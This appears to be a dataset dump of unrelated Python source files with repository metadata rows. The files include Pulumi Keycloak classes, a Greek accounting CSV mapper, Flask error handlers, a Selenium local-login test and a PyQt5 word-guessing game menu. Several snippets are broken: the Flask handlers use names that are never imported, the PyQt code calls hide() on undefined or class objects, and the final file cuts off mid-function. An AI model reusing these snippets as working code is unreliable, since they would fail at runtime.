pulumi.set(__self__, "description", description)
if policies is not None:
pulumi.set(__self__, "policies", policies)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "policies", value)
@pulumi.input_type
class ClientPermissionsMapRolesCompositeScopeArgs:
def __init__(__self__, *,
decision_strategy: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if description is not None:
pulumi.set(__self__, "description", description)
if policies is not None:
pulumi.set(__self__, "policies", policies)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "policies", value)
@pulumi.input_type
class ClientPermissionsMapRolesScopeArgs:
def __init__(__self__, *,
decision_strategy: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if description is not None:
pulumi.set(__self__, "description", description)
if policies is not None:
pulumi.set(__self__, "policies", policies)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "policies", value)
@pulumi.input_type
class ClientPermissionsTokenExchangeScopeArgs:
def __init__(__self__, *,
decision_strategy: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if description is not None:
pulumi.set(__self__, "description", description)
if policies is not None:
pulumi.set(__self__, "policies", policies)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "policies", value)
@pulumi.input_type
class ClientPermissionsViewScopeArgs:
def __init__(__self__, *,
decision_strategy: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
if decision_strategy is not None:
pulumi.set(__self__, "decision_strategy", decision_strategy)
if description is not None:
pulumi.set(__self__, "description", description)
if policies is not None:
pulumi.set(__self__, "policies", policies)
@property
@pulumi.getter(name="decisionStrategy")
def decision_strategy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "decision_strategy")
@decision_strategy.setter
def decision_strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "decision_strategy", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "policies", value)
@pulumi.input_type
class ClientRolePolicyRoleArgs:
def __init__(__self__, *,
id: pulumi.Input[str],
required: pulumi.Input[bool]):
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "required", required)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def required(self) -> pulumi.Input[bool]:
return pulumi.get(self, "required")
@required.setter
def required(self, value: pulumi.Input[bool]):
pulumi.set(self, "required", value)
| 37.734568
| 248
| 0.669502
| 2,031
| 18,339
| 5.847858
| 0.069916
| 0.124105
| 0.10373
| 0.094468
| 0.843563
| 0.798518
| 0.773933
| 0.740591
| 0.710028
| 0.69201
| 0
| 0.000069
| 0.21228
| 18,339
| 485
| 249
| 37.812371
| 0.822096
| 0.0879
| 0
| 0.739726
| 1
| 0
| 0.10784
| 0.035745
| 0
| 0
| 0
| 0
| 0
| 1
| 0.205479
| false
| 0
| 0.013699
| 0.071233
| 0.336986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eb57029032163bc18391effab995c7d84f23da62
| 4,100
|
py
|
Python
|
src/organizer.py
|
humble-goat/csv-bridge-to-erp
|
9a7ca78f5e49b5a1a465dd65e9a98a0c50e5293c
|
[
"MIT"
] | null | null | null |
src/organizer.py
|
humble-goat/csv-bridge-to-erp
|
9a7ca78f5e49b5a1a465dd65e9a98a0c50e5293c
|
[
"MIT"
] | null | null | null |
src/organizer.py
|
humble-goat/csv-bridge-to-erp
|
9a7ca78f5e49b5a1a465dd65e9a98a0c50e5293c
|
[
"MIT"
] | null | null | null |
from synalaser import make_me_whole
def choice(choose, client):
if choose == 'hlek':
if client == 'alp':
return '70-4287'
elif client == 'tim':
return '70-0087'
else:
pass
elif choose == 'hlen':
if client == 'alp':
return '70-4087'
elif client == 'tim':
return '70-0287'
else:
pass
elif choose == 'epipl':
if client == 'alp':
return '70-4487'
elif client == 'tim':
return '70-0187'
else:
pass
elif choose == 'anal':
if client == 'alp':
return '70-4187'
elif client == 'tim':
return '70-0287' # ηλεκτρονικά γιατι δεν υπήρχε λογαριασμός
else:
pass
elif choose == 'empty':
pass
def i_organize(from_dataframe, to_dataframe, timer, lib):
a = str(from_dataframe.loc[timer, 'parastatiko']).replace('#', '')
to_dataframe.loc[timer, 'α/α'] = timer
to_dataframe.loc[timer, 'καθ. αξια'] = from_dataframe.loc[timer, 29]
to_dataframe.loc[timer, 'αξια_κεπυο'] = from_dataframe.loc[timer, 29]
to_dataframe.loc[timer, 'αξια φπα'] = from_dataframe.loc[timer, 30]
to_dataframe.loc[timer, 'ημερ'] = from_dataframe.loc[timer, 11]
if a.split('-')[0] == 'ΑΛΠ':
to_dataframe.loc[timer, 'ημερ'] = from_dataframe.loc[timer, 11]
to_dataframe.loc[timer, 'αιτια'] = 'ΠΕΛΑΤΗΣ ΛΙΑΝΙΚΗΣ'
to_dataframe.loc[timer, 'κωδ. συναλ'] = '19'
to_dataframe.loc[timer, 'γεν_λογαριασμος'] = '30-0100'
to_dataframe.loc[timer, 'λογαριασμος'] = choice(lib, 'alp')
to_dataframe.loc[timer, 'παραστατικο'] = a
to_dataframe.loc[timer, 'υποχρεος'] = '1'
to_dataframe.loc[timer, 'κεπυο'] = '1'
to_dataframe.loc[timer, 'προσιμο'] = '1'
to_dataframe.loc[timer, 'ποσοστο'] = '100'
to_dataframe.loc[timer, 'ειδος'] = '0'
to_dataframe.loc[timer, 'υποχρεος_υποβ'] = '1'
elif a.split('-')[0] == 'ΤΔΠ':
to_dataframe.loc[timer, 'αιτια'] = from_dataframe.loc[timer, 'poios']
to_dataframe.loc[timer, 'κωδ. συναλ'] = make_me_whole(from_dataframe=from_dataframe.loc[timer, 'poios'],
time=timer)
to_dataframe.loc[timer, 'παραστατικο'] = a
to_dataframe.loc[timer, 'γεν_λογαριασμος'] = '30-0000'
to_dataframe.loc[timer, 'λογαριασμος'] = choice(lib, 'tim')
to_dataframe.loc[timer, 'υποχρεος'] = '1'
to_dataframe.loc[timer, 'κεπυο'] = '1'
to_dataframe.loc[timer, 'προσιμο'] = '1'
to_dataframe.loc[timer, 'ποσοστο'] = '100'
to_dataframe.loc[timer, 'ειδος'] = '0'
to_dataframe.loc[timer, 'υποχρεος_υποβ'] = '0'
elif a.split('-')[0] == 'ΠΛΔ':
to_dataframe.loc[timer, 'αιτια'] = 'ΠΕΛΑΤΗΣ ΛΙΑΝΙΚΗΣ'
to_dataframe.loc[timer, 'κωδ. συναλ'] = '19'
to_dataframe.loc[timer, 'γεν_λογαριασμος'] = '30-0100'
to_dataframe.loc[timer, 'λογαριασμος'] = choice(lib, 'alp')
to_dataframe.loc[timer, 'παραστατικο'] = a
to_dataframe.loc[timer, 'υποχρεος'] = '1'
to_dataframe.loc[timer, 'κεπυο'] = '1'
to_dataframe.loc[timer, 'προσιμο'] = '1'
to_dataframe.loc[timer, 'ποσοστο'] = '100'
to_dataframe.loc[timer, 'ειδος'] = '0'
to_dataframe.loc[timer, 'υποχρεος_υποβ'] = '1'
elif a.split('-')[0] == 'ΑΣΠ':
to_dataframe.loc[timer, 'αιτια'] = 'ΠΕΛΑΤΗΣ ΛΙΑΝΙΚΗΣ'
to_dataframe.loc[timer, 'κωδ. συναλ'] = '19'
to_dataframe.loc[timer, 'γεν_λογαριασμος'] = '30-0100'
to_dataframe.loc[timer, 'λογαριασμος'] = choice(lib, 'alp')
to_dataframe.loc[timer, 'παραστατικο'] = a
to_dataframe.loc[timer, 'υποχρεος'] = '1'
to_dataframe.loc[timer, 'κεπυο'] = '1'
to_dataframe.loc[timer, 'προσιμο'] = '1'
to_dataframe.loc[timer, 'ποσοστο'] = '100'
to_dataframe.loc[timer, 'ειδος'] = '0'
to_dataframe.loc[timer, 'υποχρεος_υποβ'] = '1'
else:
print(a.split('-')[0], timer)
| 43.157895
| 112
| 0.570976
| 496
| 4,100
| 4.568548
| 0.165323
| 0.307149
| 0.435128
| 0.419241
| 0.80053
| 0.702118
| 0.668138
| 0.643866
| 0.643866
| 0.643866
| 0
| 0.041501
| 0.265366
| 4,100
| 95
| 113
| 43.157895
| 0.710823
| 0.009756
| 0
| 0.67033
| 0
| 0
| 0.170732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021978
| false
| 0.054945
| 0.010989
| 0
| 0.120879
| 0.010989
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
cceebc9ad721be9bff679253891aed4ce9b4c890
| 47
|
py
|
Python
|
tests/test.py
|
c-okelly/passing_distance
|
85664aeca58175a4f4a3041393c288a15949bb56
|
[
"MIT"
] | 1
|
2020-01-12T12:08:26.000Z
|
2020-01-12T12:08:26.000Z
|
tests/test.py
|
c-okelly/passing_distance
|
85664aeca58175a4f4a3041393c288a15949bb56
|
[
"MIT"
] | null | null | null |
tests/test.py
|
c-okelly/passing_distance
|
85664aeca58175a4f4a3041393c288a15949bb56
|
[
"MIT"
] | null | null | null |
import nose
def testA():
assert(1 == 1)
| 6.714286
| 18
| 0.553191
| 7
| 47
| 3.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060606
| 0.297872
| 47
| 6
| 19
| 7.833333
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ccf2543dcb0e3b35c913d3076866e770013799c2
| 124
|
py
|
Python
|
partools/test/rl/__init__.py
|
paularnaud2/PyTools
|
09accc33e1dcfdde45671ad5962727554648b30c
|
[
"MIT"
] | null | null | null |
partools/test/rl/__init__.py
|
paularnaud2/PyTools
|
09accc33e1dcfdde45671ad5962727554648b30c
|
[
"MIT"
] | null | null | null |
partools/test/rl/__init__.py
|
paularnaud2/PyTools
|
09accc33e1dcfdde45671ad5962727554648b30c
|
[
"MIT"
] | null | null | null |
from .check_log import CL
from .main import reqlist
from .main import left_join_files
from .main import reqlist_interrupted
| 24.8
| 37
| 0.83871
| 20
| 124
| 5
| 0.55
| 0.24
| 0.42
| 0.42
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 124
| 4
| 38
| 31
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
690c188197073b1245e07282e181d4518dd87cac
| 2,010
|
py
|
Python
|
app/errors.py
|
lootfee/writerrific
|
e7d4aeb05af7f70db60a045d8814e1ff952483c8
|
[
"MIT"
] | null | null | null |
app/errors.py
|
lootfee/writerrific
|
e7d4aeb05af7f70db60a045d8814e1ff952483c8
|
[
"MIT"
] | null | null | null |
app/errors.py
|
lootfee/writerrific
|
e7d4aeb05af7f70db60a045d8814e1ff952483c8
|
[
"MIT"
] | null | null | null |
from flask import render_template
from app import app, db
from app.forms import LoginForm, RegistrationForm
@app.errorhandler(404)
def not_found_error(error):
register_form = RegistrationForm()
login_form = LoginForm()
if login_form.login_submit.data:
if login_form.validate_on_submit():
user = User.query.filter_by(email=login_form.login_email.data).first()
if user is None or not user.check_password(login_form.login_password.data):
flash('Invalid email or password')
return redirect(url_for('home'))
login_user(user, remember=login_form.remember_me.data)
return redirect(url_for('home'))
return render_template('404.html', register_form=register_form, login_form=login_form), 404
@app.errorhandler(413)
def file_too_large_error(error):
register_form = RegistrationForm()
login_form = LoginForm()
if login_form.login_submit.data:
if login_form.validate_on_submit():
user = User.query.filter_by(email=login_form.login_email.data).first()
if user is None or not user.check_password(login_form.login_password.data):
flash('Invalid email or password')
return redirect(url_for('home'))
login_user(user, remember=login_form.remember_me.data)
return redirect(url_for('home'))
db.session.rollback()
return render_template('413.html', register_form=register_form, login_form=login_form), 413
@app.errorhandler(500)
def internal_error(error):
register_form = RegistrationForm()
login_form = LoginForm()
if login_form.login_submit.data:
if login_form.validate_on_submit():
user = User.query.filter_by(email=login_form.login_email.data).first()
if user is None or not user.check_password(login_form.login_password.data):
flash('Invalid email or password')
return redirect(url_for('home'))
login_user(user, remember=login_form.remember_me.data)
return redirect(url_for('home'))
db.session.rollback()
return render_template('500.html', register_form=register_form, login_form=login_form), 500
| 42.765957
| 93
| 0.762687
| 292
| 2,010
| 4.989726
| 0.181507
| 0.14825
| 0.115305
| 0.082361
| 0.849691
| 0.849691
| 0.849691
| 0.849691
| 0.849691
| 0.754976
| 0
| 0.01542
| 0.128856
| 2,010
| 47
| 94
| 42.765957
| 0.816676
| 0
| 0
| 0.727273
| 0
| 0
| 0.062595
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0.136364
| 0.068182
| 0
| 0.340909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
69114e3811b10988e237f0a44bf61b9719e4a09d
| 60
|
py
|
Python
|
orchestration/tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
orchestration/tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
orchestration/tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
from math import fabs
def get_fabs(x):
return fabs(x)
| 10
| 21
| 0.683333
| 11
| 60
| 3.636364
| 0.727273
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.233333
| 60
| 5
| 22
| 12
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
15ea3063cd74f47058aefc56a511836d9a911888
| 150
|
py
|
Python
|
loldib/getratings/models/NA/na_yorick/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_yorick/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_yorick/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_yorick_top import *
from .na_yorick_jng import *
from .na_yorick_mid import *
from .na_yorick_bot import *
from .na_yorick_sup import *
| 25
| 29
| 0.766667
| 25
| 150
| 4.2
| 0.36
| 0.285714
| 0.571429
| 0.685714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 150
| 5
| 30
| 30
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c6388de9e2b30fb3adfe7ca3f1159bf01600dac1
| 3,018
|
py
|
Python
|
tests/login-logout.py
|
caggri/FOFviz
|
776ab387d832a86eea1a1b9064040d9b012494a7
|
[
"MIT"
] | 2
|
2020-05-24T22:28:53.000Z
|
2020-05-25T21:58:24.000Z
|
tests/login-logout.py
|
caggri/FOFviz
|
776ab387d832a86eea1a1b9064040d9b012494a7
|
[
"MIT"
] | null | null | null |
tests/login-logout.py
|
caggri/FOFviz
|
776ab387d832a86eea1a1b9064040d9b012494a7
|
[
"MIT"
] | 1
|
2021-10-16T12:26:29.000Z
|
2021-10-16T12:26:29.000Z
|
from selenium import webdriver
import time
import secrets
import string
chromedriver = "C:/Users/deniz/chromedriver/chromedriver"
driver = webdriver.Chrome(chromedriver)
driver.get('http://127.0.0.1:8000/')
usr = "haydar"
pwd = "123"
alphabet = string.ascii_letters + string.digits
password = ''.join(secrets.choice(alphabet) for i in range(12))
getstarted_btn = '//*[@id="hero"]/div/div/div[1]/div[1]/a[2]'
user_dropdown = '//*[@id="userDropdown"]'
username_input = '//*[@id="id_username"]'
password_input = '//*[@id="id_password"]'
login_btn = '//*[@id="loginBtn"]'
logout_btn = '//*[@id="content"]/nav/ul/li/div/a[3]'
logout = '//*[@id="logoutModal"]/div/div/div[3]/a'
#Go to user
time.sleep(3)
driver.find_element_by_xpath(getstarted_btn).click()
time.sleep(3)
driver.find_element_by_xpath(user_dropdown).click()
#faulty credentials
time.sleep(3)
driver.find_element_by_xpath(username_input).send_keys("haysashasc")
time.sleep(1)
driver.find_element_by_xpath(password_input).send_keys(password)
time.sleep(1)
driver.find_element_by_xpath(login_btn).click()
time.sleep(3)
driver.find_element_by_xpath(username_input).clear()
time.sleep(1)
driver.find_element_by_xpath(username_input).send_keys("HAYDAR")
time.sleep(1)
driver.find_element_by_xpath(password_input).send_keys("123")
time.sleep(1)
driver.find_element_by_xpath(login_btn).click()
time.sleep(3)
driver.find_element_by_xpath(username_input).clear()
time.sleep(1)
driver.find_element_by_xpath(username_input).send_keys(" ")
time.sleep(1)
driver.find_element_by_xpath(password_input).send_keys("26431546464646456546454646454646")
time.sleep(1)
driver.find_element_by_xpath(login_btn).click()
time.sleep(3)
driver.find_element_by_xpath(username_input).clear()
time.sleep(1)
driver.find_element_by_xpath(username_input).send_keys("jphnsx")
time.sleep(1)
driver.find_element_by_xpath(password_input).send_keys(" ")
time.sleep(1)
driver.find_element_by_xpath(login_btn).click()
time.sleep(3)
driver.find_element_by_xpath(username_input).clear()
time.sleep(1)
driver.find_element_by_xpath(username_input).send_keys("????")
time.sleep(1)
driver.find_element_by_xpath(password_input).send_keys("!:;")
time.sleep(1)
driver.find_element_by_xpath(login_btn).click()
time.sleep(3)
driver.find_element_by_xpath(username_input).clear()
time.sleep(1)
driver.find_element_by_xpath(username_input).send_keys("bronson@cdcdc.com")
time.sleep(1)
driver.find_element_by_xpath(password_input).send_keys("x")
time.sleep(1)
driver.find_element_by_xpath(login_btn).click()
#correct login
time.sleep(3)
driver.find_element_by_xpath(username_input).clear()
time.sleep(1)
driver.find_element_by_xpath(username_input).send_keys(usr)
time.sleep(1)
driver.find_element_by_xpath(password_input).send_keys(pwd)
time.sleep(1)
driver.find_element_by_xpath(login_btn).click()
#logout
time.sleep(4)
driver.find_element_by_xpath(user_dropdown).click()
time.sleep(2)
driver.find_element_by_xpath(logout_btn).click()
time.sleep(2)
driver.find_element_by_xpath(logout).click()
| 30.18
| 90
| 0.792247
| 481
| 3,018
| 4.659044
| 0.162162
| 0.128514
| 0.242749
| 0.271307
| 0.727354
| 0.727354
| 0.727354
| 0.727354
| 0.688532
| 0.684962
| 0
| 0.030335
| 0.049702
| 3,018
| 99
| 91
| 30.484848
| 0.751046
| 0.015573
| 0
| 0.560976
| 0
| 0.012195
| 0.123357
| 0.086619
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.109756
| 0.04878
| 0
| 0.04878
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d6d846ec29fa17c3a9282db16af3f16e422d85fb
| 44,437
|
py
|
Python
|
FinalPython_TaiNgo.py
|
NoNameGr/NoName
|
e437ada090612bb44de0524affb66348537eda56
|
[
"MIT"
] | null | null | null |
FinalPython_TaiNgo.py
|
NoNameGr/NoName
|
e437ada090612bb44de0524affb66348537eda56
|
[
"MIT"
] | null | null | null |
FinalPython_TaiNgo.py
|
NoNameGr/NoName
|
e437ada090612bb44de0524affb66348537eda56
|
[
"MIT"
] | 2
|
2020-07-30T04:10:37.000Z
|
2020-07-30T04:15:10.000Z
|
from PyQt5 import QtCore, QtGui, QtWidgets
class Version(object):
def setupUi(self, Frame):
Frame.setObjectName("Version")
Frame.resize(452, 296)
self.label_3 = QtWidgets.QLabel(Frame)
self.label_3.setGeometry(QtCore.QRect(110, 100, 91, 81))
font = QtGui.QFont()
font.setPointSize(18)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(340, 60, 81, 31))
self.label_2.setObjectName("label_2")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(100, 20, 271, 51))
font = QtGui.QFont()
font.setPointSize(31)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(240, 101, 131, 41))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Frame)
self.pushButton_2.setGeometry(QtCore.QRect(240, 150, 131, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label_3.setText(_translate("Frame", "Phiên bản"))
self.label_2.setText(_translate("Frame", "by NoName"))
self.label.setText(_translate("Frame", "Đuổi hình bắt chữ"))
self.pushButton.setText(_translate("Frame", "Tiếng Việt"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Level()
self.pushButton_2.setText(_translate("Frame", "English"))
self.pushButton_2.clicked.connect(self.on_pushButton_2)
self.dialog_1 = LevelEng()
def on_pushButton(self):
Dialog.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Level()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
def on_pushButton_2(self):
Dialog.hide()
import sys
dialog_1 = QtWidgets.QApplication(sys.argv)
dialog_1 = QtWidgets.QDialog()
self.dialog_1.ui = LevelEng()
self.dialog_1.setupUi(dialog_1)
dialog_1.show()
dialog_1.exec_()
class Level(object):
def setupUi(self, Frame):
Frame.setObjectName("Level")
Frame.resize(452,296)
self.label_4 = QtWidgets.QLabel(Frame)
self.label_4.setGeometry(QtCore.QRect(40, 110, 171, 81))
font = QtGui.QFont()
font.setPointSize(18)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(50, 30, 271, 51))
font = QtGui.QFont()
font.setPointSize(31)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(290, 70, 81, 31))
self.label_2.setObjectName("label_2")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(200, 100, 131, 41))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Frame)
self.pushButton_2.setGeometry(QtCore.QRect(200, 150, 131, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(Frame)
self.pushButton_3.setGeometry(QtCore.QRect(200, 200, 131, 41))
self.pushButton_3.setObjectName("pushButton_3")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label_4.setText(_translate("Frame", "Mức độ chơi "))
self.label.setText(_translate("Frame", "Đuổi hình bắt chữ"))
self.label_2.setText(_translate("Frame", "by NoName"))
self.pushButton.setText(_translate("Frame", "Dễ"))
self.pushButton.clicked.connect(self.on_pushButton_1)
self.dialog = De()
self.pushButton_2.setText(_translate("Frame", "Trung Bình"))
self.pushButton_2.clicked.connect(self.on_pushButton_2)
self.dialog_2 = TrungBinh()
self.pushButton_3.setText(_translate("Frame", "Khó"))
self.pushButton_3.clicked.connect(self.on_pushButton_3)
self.dialog_3 = Kho()
def on_pushButton_1(self):
Level.hide()
import sys
app = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = De()
self.dialog.ui.setupUi(dialog)
dialog.show()
